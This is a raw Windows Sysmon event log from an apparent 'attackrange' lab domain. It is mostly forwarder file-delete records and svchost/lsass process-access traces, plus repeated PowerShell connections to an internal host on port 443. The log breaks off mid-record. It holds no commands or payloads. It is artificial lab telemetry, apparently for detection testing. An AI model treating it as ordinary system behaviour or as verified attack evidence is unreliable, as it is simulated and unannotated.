AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035341623Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:32.209{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D3818A235963C734852955BB7EFB77B9,SHA256=F3CEC2460302A7AD5B5F08E4DE05B77079143A74E8FCE0DA7117ABFFDD3F6485,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341622Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:32.209{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1A3FCC9FE205BF78751C1773BC4202A3,SHA256=42D4589EAC3DD77DD5C0705DF7FAFE2C63AC9A43A6E2D7FC53A68B9C056E10E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035341621Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:32.056{B81B27B7-71E3-613B-14B4-03000000C801}37806148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035341620Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:32.009{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F1FD839DDA69C79D4D68BBF953FDE36,SHA256=DA6E91A5D5C634A11BB2B103A344B05D23A5FEC0F188769374FA8B9D1ACC6D81,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341633Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:33.606{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D3818A235963C734852955BB7EFB77B9,SHA256=F3CEC2460302A7AD5B5F08E4DE05B77079143A74E8FCE0DA7117ABFFDD3F6485,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341632Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:33.024{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F7F738088BE9000D0E27CDDA30972F2,SHA256=71B6B5425E30E5D3CBC0D772284F72FD422B544E358E63E1C6B98C27DCF2966C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341634Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:34.039{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEE4160BF5F4754F0135554DBC3E0E88,SHA256=6AEEC9A1ACC03FA166923C19EE6E7918E608BBE15038A61116BDA01829001B90,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341636Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:35.585{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B6648467FC67B024F67BA084EA509E1A,SHA256=CFA3B884BE55A76377FB6B7AFCA471ED793E0C4DE76998115D12343EB4503571,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341635Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:35.070{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D7F294888456CA1CFB7F76DBB1D82CE,SHA256=EA6360BA4A2ED9DBA84189648FB43686A766FA7767CD45F38FDD8BBA0A7A2D65,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341640Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:36.537{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF75f32602.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341639Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:02.096{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52322-false10.0.1.12-8000- 354300x800000000000000035341638Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:01.566{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52321-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341637Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:36.103{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=225CDE41981E1155F8566CEF21ECAAE3,SHA256=724510AFE4B0932D42C6F8CA93148DF57F2323B2E04EE89D14B66064EFB3E16E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341641Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:37.137{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1AFC0B83379192A4EDE3D43EBFE3AF6,SHA256=B6838BD4BE853BFC8BA6CF7B5ADAB77F81208441CBC55B4571BBBB6955295374,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341642Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:38.167{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A2D1A57B4502951CCAF6DA818BE71BC,SHA256=A2515F175205EA77D912C9C2E5A14C17A04966913B0999EF524F9F4EE199C701,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341643Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:39.199{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E0D3F1425674F75BBEFDAE7DAF593BA,SHA256=6FF2E6038F8C292020C7D7D24C7217789C0F404E727F1EE54FB9211E4B9A7118,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341645Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:40.599{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B2285610F466844C81EEE4FB3F60868D,SHA256=04B7AF404372C86B6690B61F5DABEED38157D8B618A5B93FB964F9470D625E8B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341644Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:40.218{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2F7249F1D223A85A1353A7C24F4B533,SHA256=52691A939C18AD65220FB4B415A5546DAC1B006CFD71252B01181E56F5F66DFD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341648Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:07.213{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52324-false10.0.1.12-8000- 354300x800000000000000035341647Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:06.577{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52323-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341646Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:41.249{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0EFC3B4EEF4F958D7CE4EB06C96CD3E,SHA256=627C4CBC7C58B8D7DCCB82A25B160F7F150B8EE46A4C1652A933113A714D3838,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341649Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:42.264{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E482DF4ADF2C229682EE7EC43208FF6E,SHA256=633D25BA9DCB307140B1F8CE2D06C36120FC597291FAEC75E00C68949E5DC338,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341650Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:43.332{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13C73692CD2F404BFA81A4C3FE030DDB,SHA256=0B6B97F813C12FFAEAFB858EF0242E8BAFA1CF5CC9899DCE7564CD45699BFC65,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341653Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:44.862{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=0A7134B59A89B8D0E93A4D8240E78439,SHA256=B5F12F339A71F0C26E08EBB01FF2E0903F78E8591DE41395C22A42B7B2FB3531,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341652Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:44.697{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=218959D57DF856F83F329F4C1DB49010,SHA256=D5E0D50F19E75863800D984B5BD353529C1C738FFF894F4873577E91360DFDC9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341651Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:44.378{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74A8D4D8FC5B6D5E288A2561CD037581,SHA256=8FAEF99624C7E9B2B0239C1F5473F14D398A05F51786479A78C03EB449029115,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341655Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:10.590{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52325-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341654Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:45.379{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D385CBB6764D8D1899CA36B894FEE33,SHA256=9836744F12D5FC17B889ED7CB7E00DA9D0AF1252EE51F4D3AD0FBDCD5BD47C3C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341656Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:46.396{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15FA3E44867B27C9167C7E1E51279F40,SHA256=E77CDD1B61F326C9818965B6BBE20CE5590BD66006A0A2428E1D14BF01E73E01,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341658Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:13.092{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52326-false10.0.1.12-8000- 23542300x800000000000000035341657Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:47.431{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7D8CB4CEB7ABC36510F079D4A849D1E,SHA256=25B3E6C2EE0F55156ADEF2E34878DAFA29953F615DB5D9CACAB8379F0D88D91F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341661Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:14.612{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52327-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341660Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:48.699{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=907F4019CB765805919131464BBC130E,SHA256=507DD5BCD624B47E2AA093F040FAA803771E74D55DE0B96DB9446425878DA050,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341659Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:48.531{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC7B8C55D91E6BFAB3B0E9AB76F1E0FE,SHA256=540ABBCC963646CF370DAAC78D0ECAF06B33A9AA00AA1382114C018FFB31E68B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341662Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:49.578{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74E4543D01013E7E5FD4C4C0E2C4448C,SHA256=E802A71ABF14C87BDA27A64838B43E89F97E1C3B43DBC35127D7160A581DEDD8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341663Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:50.593{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DCCF46A3D6046172FD05160C3A198EE,SHA256=3FA8B1040B3EB8496E765DF9622BC74C7F4C9B33F4D4C04CA42653AA00DDD929,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341664Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:51.693{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE3FCB016EEF751187A3D24EA5FBF32E,SHA256=ED359F8C891019C6321A4457CD487CAC30735E0AEDEBF92D5A7A76C176E5F665,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341666Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:52.729{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEA71B6B93E9C21F0831F62FCB6E92C8,SHA256=A42FC4F7211BB8990E0A701070E73A5441F34ACCEC19BA7C740B83DA658EC536,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341665Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:52.660{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=985C1EFA6E2D8FCB6817CB904745DFCF,SHA256=07C7E0763BF5CB3132C27D1A46EBE887B05B48A867E656D86B3037ED2A55E84C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341669Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:53.759{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F49FBFA9A2AC804A95E6ED55E4C7E908,SHA256=46D6E7F43F80123D7E2CDEE2346083B1A19B6C85075C27845B29D3ABB82BDBEE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341668Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:18.625{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52329-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035341667Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:18.209{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52328-false10.0.1.12-8000- 23542300x800000000000000035341670Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:54.774{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F389DDB638452498318C2467FC9D0546,SHA256=0AFA34BB188090A6F8FB72B3C1B2EEEAD64DD90E7450AA1D0E4D77A4C40E56AA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341671Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:55.790{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6559AC81F91C2E2C0CD9760EB0BACB61,SHA256=1A16392F4E84CADC604D55C7B5E90912DB0FC2BAED211FCAE4062D39B8C54784,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035341702Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.357{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341701Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.357{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341700Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.357{B81B27B7-4012-611D-0B00-00000000C801}6361624C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341699Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 